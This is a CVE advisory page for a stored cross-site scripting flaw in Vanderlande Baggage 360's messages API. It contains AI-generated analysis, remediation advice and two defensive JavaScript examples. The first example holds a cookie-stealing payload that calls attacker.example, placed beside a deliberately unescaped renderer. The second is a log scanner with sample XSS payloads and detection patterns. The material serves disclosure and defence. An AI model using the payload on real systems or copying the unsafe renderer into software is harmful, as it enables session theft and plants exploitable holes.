Vanderlande Baggage 360 CVE-2025-11308
Severity (by source): LOW
CVSS 4.0 vector (NVD): CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
Description (CVE.org)
A vulnerability was identified in Vanderlande Baggage 360 7.0.0. This issue affects some unknown processing of the file /api-addons/v1/messages. Such manipulation of the argument Message leads to cross-site scripting. The attack may be performed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
Analysis (AI-generated)
The CVE description reports cross-site scripting through the Message parameter of the /api-addons/v1/messages endpoint in Vanderlande Baggage 360 7.0.0; it does not say whether the injected script is reflected or stored. The NVD vector (PR:L, UI:P, VI:L) describes an authenticated remote attacker whose payload runs when a victim passively views the affected content, which is consistent with a stored variant in which a poisoned message is displayed to other users, exposing their sessions and any action their browser is allowed to perform in the application. The description notes that public exploit code exists (matching E:P, proof-of-concept, in the vector). The EPSS score of 0.03% nonetheless places the baseline exploitation probability low, which is what one expects for an authenticated, low-impact bug in a niche industrial product with limited internet exposure, not a sign that the bug is hard to trigger.
Technical Context (AI-generated)
The affected component is the /api-addons/v1/messages API endpoint of Vanderlande Baggage 360. The weakness class is CWE-79 (Improper Neutralization of Input During Web Page Generation): the value supplied in the Message parameter reaches an HTML context in the web interface without output encoding, so markup and script inside it are interpreted by the viewer's browser instead of being shown as text. Because the endpoint handles messages that are kept and shown to other users, the likely form is stored XSS: the payload persists server-side and executes in the browser of every user who views that message, for as long as it remains, without the victim having to click an attacker-supplied link. That persistence and reach is what makes a stored variant in a shared operational system more serious than a reflected one.
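The pattern above, as an added illustration that is not code from Vanderlande or from the source page: the message store, the attacker payload, the render functions and the escapeHtml helper are all hypothetical, constructed to show how an unencoded Message value becomes script in the viewer's browser and how output encoding at render time prevents it.

```javascript
// Added illustration of the CWE-79 pattern described above. Nothing here is
// Vanderlande code: the store, payload and render functions are hypothetical,
// constructed to show how an unencoded Message value becomes script in the
// viewer's browser and how output encoding at render time prevents it.

// Constructed attacker input of the kind a stored-XSS payload in a message
// field takes. It is inert text in this script; nothing here executes it.
const ATTACKER_MESSAGE =
  '<img src=x onerror="new Image().src=\'https://attacker.example/c?\'+document.cookie">';

// Hypothetical server-side store standing in for whatever persists messages
// posted to /api-addons/v1/messages.
const messageStore = [];

function postMessage(author, message) {
  // Storing raw input is not the bug; the bug is what happens at render time.
  messageStore.push({ author, message });
}

// VULNERABLE: the Message value is concatenated straight into HTML, so any
// markup in it is parsed as markup by every browser that loads the page.
function renderMessageUnsafe(entry) {
  return `<li><b>${entry.author}</b>: ${entry.message}</li>`;
}

// Output encoding for the HTML text and attribute contexts. This is the fix
// for CWE-79: it does not depend on guessing what "bad" input looks like.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// HARDENED: same layout, every dynamic value encoded before it enters the HTML.
function renderMessageSafe(entry) {
  return `<li><b>${escapeHtml(entry.author)}</b>: ${escapeHtml(entry.message)}</li>`;
}

// Render every stored message with the given renderer; each viewer of the
// message list would receive this HTML.
function renderMessageList(renderer) {
  return `<ul>${messageStore.map(renderer).join('')}</ul>`;
}

// Crude check used only to make the difference visible in the output: does the
// rendered HTML contain a live tag carrying an on*= event-handler attribute?
function containsLiveMarkup(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

postMessage('alice', 'Bag 1042 rerouted to carousel 7 & 8');
postMessage('attacker', ATTACKER_MESSAGE);
console.log('unsafe render carries live payload:', containsLiveMarkup(renderMessageList(renderMessageUnsafe)));
console.log('safe render carries live payload:  ', containsLiveMarkup(renderMessageList(renderMessageSafe)));
```

Run it with node. The only difference between the two renderers is the escapeHtml call on each dynamic value; the store, the payload and the page layout are identical, which is the point: the defect is in output generation, not in what is accepted or stored.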
Affected Products (AI-generated)
Vanderlande Baggage 360 version 7.0.0 is the only version named as affected. No CPE string is provided in the available data, and no fixed version is listed in the supplied references; the CVE description states that the vendor was contacted before disclosure and did not respond, so whether later releases are affected or fixed is unknown.
Remediation (AI-generated)
Ask Vanderlande for a fixed build of Baggage 360 that addresses the cross-site scripting in the /api-addons/v1/messages endpoint; no patched version number is available, since the vendor had not responded at disclosure time. Until one exists, the following controls reduce exposure but do not remove the bug.

Output encoding is the actual fix and the first thing to confirm with the vendor: every Message value rendered in the web interface must be HTML-entity encoded for the context it lands in. Input validation that rejects Message values containing <script>, javascript: or on*= handlers is only a weak supplement, because encoded or obfuscated payloads slip past simple string matching; do not rely on it alone.

A Content Security Policy whose script-src omits 'unsafe-inline' (nonce- or hash-based, or limited to a self-hosted script origin) stops inline scripts and event-handler attributes from executing even while the encoding bug is present. Roll it out in report-only mode first (Content-Security-Policy-Report-Only): legitimate inline scripts in the application will break under a strict policy, so test thoroughly before enforcing it in production.

Restrict who can reach the messages endpoint, and the application generally, to trusted internal networks and accounts. The attacker needs valid credentials (PR:L), so the set of users able to post messages is the attack surface.

Monitor for Message submissions containing <script>, javascript:, onerror= and similar payloads. Standard web-server access logs do not record POST bodies, so this needs application-level or WAF logging of request bodies, and the match should be run on the decoded value, since payloads are frequently URL- or entity-encoded.
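The log-monitoring advice above, as an added example that is not code from Vanderlande or from the source page. It assumes an application-level request log in which each line is a JSON object carrying the request body (an assumption: ordinary web-server access logs never contain the Message value); the log lines, user names and addresses below are constructed for the example, and the endpoint path is the one named in the CVE description.

```javascript
// Added example: triage scanner for Message submissions to the endpoint named
// in the CVE. Assumes a JSON-per-line application request log that includes
// the request body; the entries below are constructed, not real traffic.
const SAMPLE_LOG = [
  '{"ts":"2025-10-06T09:14:02Z","user":"ops1","src":"10.20.30.41","method":"POST","path":"/api-addons/v1/messages","body":{"Message":"Belt 3 stopped, clearing jam"}}',
  '{"ts":"2025-10-06T09:15:40Z","user":"contractor7","src":"10.20.30.77","method":"POST","path":"/api-addons/v1/messages","body":{"Message":"<script>alert(document.cookie)</script>"}}',
  '{"ts":"2025-10-06T09:16:05Z","user":"contractor7","src":"10.20.30.77","method":"POST","path":"/api-addons/v1/messages","body":{"Message":"%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"}}',
  '{"ts":"2025-10-06T09:16:30Z","user":"ops2","src":"10.20.30.42","method":"GET","path":"/api-addons/v1/messages"}',
  'not json at all',
];

const MESSAGE_PATH = '/api-addons/v1/messages'; // endpoint from the CVE description
const WRITE_METHODS = new Set(['POST', 'PUT', 'PATCH']);

// Payload shapes named in the remediation text plus a few common relatives.
// This is a triage signal, not a filter: it is easy to evade and must not
// stand in for output encoding in the application itself.
const SUSPICIOUS = [
  ['script tag', /<\s*script\b/i],
  ['javascript: URL', /javascript\s*:/i],
  ['event handler attribute', /<[a-z][^>]*\son[a-z]+\s*=/i],
  ['embedding element', /<\s*(iframe|object|embed|svg)\b/i],
];

// Undo the two encodings most often used to slip past naive greps:
// percent-encoding and HTML entities. Applied repeatedly (bounded) because
// payloads are sometimes double-encoded.
function normalize(text) {
  let out = String(text);
  for (let i = 0; i < 3; i++) {
    let next = out;
    try { next = decodeURIComponent(next); } catch (_) { /* not valid percent-encoding; keep as is */ }
    next = next
      .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
      .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
      .replace(/&lt;/gi, '<').replace(/&gt;/gi, '>').replace(/&quot;/gi, '"').replace(/&amp;/gi, '&');
    if (next === out) break;
    out = next;
  }
  return out;
}

// Returns the name of the first matching pattern, or null for a clean value.
function classify(message) {
  const text = normalize(message);
  for (const [reason, re] of SUSPICIOUS) {
    if (re.test(text)) return reason;
  }
  return null;
}

// One finding per write request to the messages endpoint whose Message field
// matches a suspicious pattern after decoding. Malformed lines are skipped.
function scanMessageLog(lines) {
  const findings = [];
  for (const line of lines) {
    let entry;
    try { entry = JSON.parse(line); } catch (_) { continue; }
    if (entry.path !== MESSAGE_PATH || !WRITE_METHODS.has(entry.method)) continue;
    const message = entry.body && entry.body.Message;
    if (typeof message !== 'string') continue;
    const reason = classify(message);
    if (reason) findings.push({ ts: entry.ts, user: entry.user, src: entry.src, reason });
  }
  return findings;
}

for (const f of scanMessageLog(SAMPLE_LOG)) {
  console.log(`${f.ts} ${f.user}@${f.src}: ${f.reason}`);
}
```

The decode step is what makes the third sample line a hit: its Message is percent-encoded and would never match a grep for onerror= on the raw log. Findings name the posting account and source address because, with PR:L, the response is to review and if necessary disable that account, not only to clean the stored message.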
External POC / Exploit Code